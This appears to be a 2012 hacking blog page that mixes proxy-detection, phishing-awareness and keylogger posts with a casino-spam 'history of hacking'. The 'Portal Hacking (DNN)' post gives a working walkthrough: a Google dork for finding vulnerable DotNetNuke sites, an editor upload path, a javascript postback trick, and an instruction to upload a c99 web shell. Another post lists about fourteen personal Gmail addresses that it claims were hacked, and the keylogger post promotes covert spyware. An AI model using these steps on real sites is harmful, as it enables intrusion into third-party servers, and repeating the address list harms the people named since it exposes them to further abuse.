This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Don`t Learn to HACK - Hack to LEARN.All about Ethical Hacking, Penetration Testing & Computer Security

Saturday, October 6, 2012

Mail account & Many Facebooks Hacked

 



HI All 

Mail account & Many Facebooks Hacked by Myanmar hacker guru.

Will u see some email in under ?Okay

I want to owe This mails.Join to myanmarhackerguru@gmail.com

mmaunggyi@gmail.com
akbar2081@gmail.com
titan278109@gmail.com
ihatenightmare22@gmail.com
mydreammustbesuccessful@gmail.com
deathemo88@gmail.com
babylay.bur@gmail.com
tukanghackerperusuh@gmail.com
karimullah1990@gmail.com
nnyspar@gmail.com
beebar.83@gmail.com
offline.jucy@gmail.com
kophyo079@gmail.com
atmon7@gmail.com

Tuesday, September 11, 2012

How to Detect Anonymous IP Addresses

As the fraudsters are now becoming more sophisticated in bypassing the Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, it has become very much necessary to come up with a means for detecting the proxies so that the authenticity of the users can be verified
                                 



Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain the online privacy. However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP. 


1. Credit Card Frauds
For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.
 
2. Bypass Website Country Restrictions
Some website services are restricted to users form only a selected list of countries. For example, a paid survey may be restricted only to countries like United States and Canada. So a user from say China may use a proxy so as to make his IP appear to have come from U.S. so that he can earn from participating in the paid survey.
  
Proxy Detection Services
 So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.
 
How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.
 
How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. If it is a suspected proxy then you will see the results something as follows.

                                                 . 



So for all those who think that they can escape by using a spoofed IP, this post is the answer. I hope this information helps. Pass your comments.    

Enjoy..!!                 

What is Phishing ?


Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets.
Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used.
Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.
Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut are also a target of phishing.
Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.
 
TECHNIQUES BEHIND PHISHING ATTACK
 
1. Link Manipulation
Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL
 
2. Filter Evasion
Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. This is the reason Gmail or Yahoo will disable the images by default for incoming mails.
 
How does a phishing attack/scam look like?
As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows. They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites. Here is an example of how the phishing scam email looks like

                              
Example of a phishing e-mail message, including a deceptive URL address linking to a scam Web site.
To make these phishing e-mail messages look even more legitimate, the scam artists may place a link in them that appears to go to the legitimate Web site (1), but it actually takes you to a phishing site (2) or possibly a pop-up window that looks exactly like the official site.
These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.
 
How to identify a fraudulent e-mail?
Here are a few phrases to look for if you think an e-mail message is a phishing scam.
“Verify your account.”
Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.
“If you don’t respond within 48 hours, your account will be closed.”
These messages convey a sense of urgency so that you’ll respond immediately without thinking.
“Dear Valued Customer.”
Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.
“Click the link below to gain access to your account.”
HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.
Notice in the following example that resting the mouse pointer on the link reveals the real Web address, as shown in the box with the yellow background. The string of cryptic numbers looks nothing like the company’s Web address, which is a suspicious sign.


So the Bottom line to defend from phishing attack is
1. Never assume that an email is valid based on the sender’s email address.
2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.
3. An email from trusted organization will never contain attachments or software.
4. Clicking on a link in an email is the most insecure way to get to your account.

Enjoy..!!

What are Keyloggers

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.
There are two types of keystroke loggers:
1. Software based and
2. Hardware based.

Spy ware: Spector (www.spector.com)
  • Spector is a spy ware and it will record everything anyone does on the internet.
  • Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.
  • Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.
Hacking Tool: eBlaster (www.spector.com)
  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.
  • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.
  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.
Hacking Tool: (Hardware Keylogger) (www.keyghost.com)

                                      
  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.
  • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.
  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.
Hacking Tool: (Hardware Keylogger)
  • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
  • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user. 
  •                       
  • Enjoy

Portal Hacking (DNN) - Website Hacking Technique

Hello frnds, Now these days hacking is very popular among hackers but there are very types of hacking .One more hacking method called "Portal Hacking (DNN)". This method also uses google search to find hackable sites.. Now you can imagine that how much google.com is important for Hackers also...
                                                       
Note:-This article is for educational purpose only.
Step 1 :
http://www.google.com

Step 2:Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:
Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')
 

Step 9:You will Find the Upload Option


Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 etc etc.
Enjoy..!!

History of hacking



The first hackers appeared almost simultaneously with the first computers meant. The past couple of decades have seen many attempts made to evade computer systems wither as a protest or due to personal interest by the hackers. But these hackers pose a continuous threat to the security of our PCs, and computer systems as well as the information. Even the most popular casino Sites are keen interest of these hackers. Let us take a brief look at the history of hacking.
When the first operating systems came into being at the MIT, it also unveiled the vulnerabilities involved for these systems. In the sixties, some issues were found in the Multics CTSS system on an IBM, which led to the use of the password for any user. The arrival of the 70s was important in the history of hacking as the number of phone hackers were found to be on the rise. Apple founders Steve Wozniacki and Steve Jobs were also engrossed in developing the "blue box", which was a hacking tool.
It was in the 80s, that most hackers started showing keen interest in the computer industry. In 1986 there was increasing number of attacks on the first U.S. law against hackers. The hackers were seen creating he first online communication tools. In 1989, the first international case of espionage came to light and 3 German hackers were charged for stealing US companies’ information and selling it to the KGB. When the Netscape Navigator came on scene in 1994, the hackers carried their activities on the web. Some Russian hackers were known to steal $ 10 million from Citibank. AOHELL program of the nineties allowed budding hackers to interrupt the AOL services. Microsoft released hundreds of patches in 1999, for bugs in Windows 98, which could be again exploited by hackers. It is therefore essential for one to sign up only at safe online casinos.
Since 2000, the attacks against Yahoo!, eBay and Amazon are on the rise. Microsoft has been victim of the first DNS attack. A group of hackers was arrested by FBI for infiltrating into a million of Pc’s and damaging property worth millions. The recent years have seen an important group of hackers gathering many supporters and have carried one of the major attacks in hacking history harming multiple websites Operation Aurora, a very recent in hacking history, had the Chinese hackers stealing sensitive information from Google and breaking into the PlayStation network, thus exposing accounts of about 77 million users in 2011. Mae sure you are at a very safe site from hackers before playing some exciting card and table games.

Monday, September 10, 2012

How To Automatically Log Out From Facebook After Certain Time

I know its happen to many people , suppose you are chatting with your friends in Facebook then you got a phone on somebody came in your door , you just leave your PC without log out from Facebook and you forget that you were chatting with your friends in Facebook.On the opposite site your friend become angry that you are not replying.If you have face this kind stuff then best is automatically log off from Facebook after a certain or fixed time if you forget to log out.So try this awesome trick
Step 1:Download and install this Firefox add on Click Here"
Step 2:Default time to auto log out is 60 second , just change it just opening the add on by clicking Firefox in the top left, then Add-ons, then Options .